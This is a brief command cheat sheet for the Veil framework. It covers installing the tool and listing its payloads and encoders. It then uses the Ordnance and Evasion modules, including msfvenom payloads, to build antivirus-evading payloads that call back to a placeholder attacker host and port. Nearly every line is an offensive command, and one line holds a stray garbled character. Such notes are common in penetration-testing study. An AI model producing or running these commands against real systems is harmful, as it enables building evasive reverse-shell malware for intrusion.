apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
./Veil.py --list-tools
./Veil.py -t Ordnance --list-payloads
./Veil.py -t Ordnance --list-encoders
./Veil.py -t Ordnance --ordnance-payload <type> --ip <lhost> --port <lport> -o <file>
./Veil.py -t Ordnance --ordnance-payload <type>Ā --ip <lhost> --port <lport> -e <encoder> -b <badchars \\00\\0a> -o <file>
./Veil.py -t Evasion --list-payloads
./Veil.py -t Evasion -p <id> --ordnance-payload <payload> --ip <lhost> --port <lport> -o <file>
./Veil.py -t Evasion -p <id> --msfvenom <payload> --ip <lhost> --port <lport> -o <file>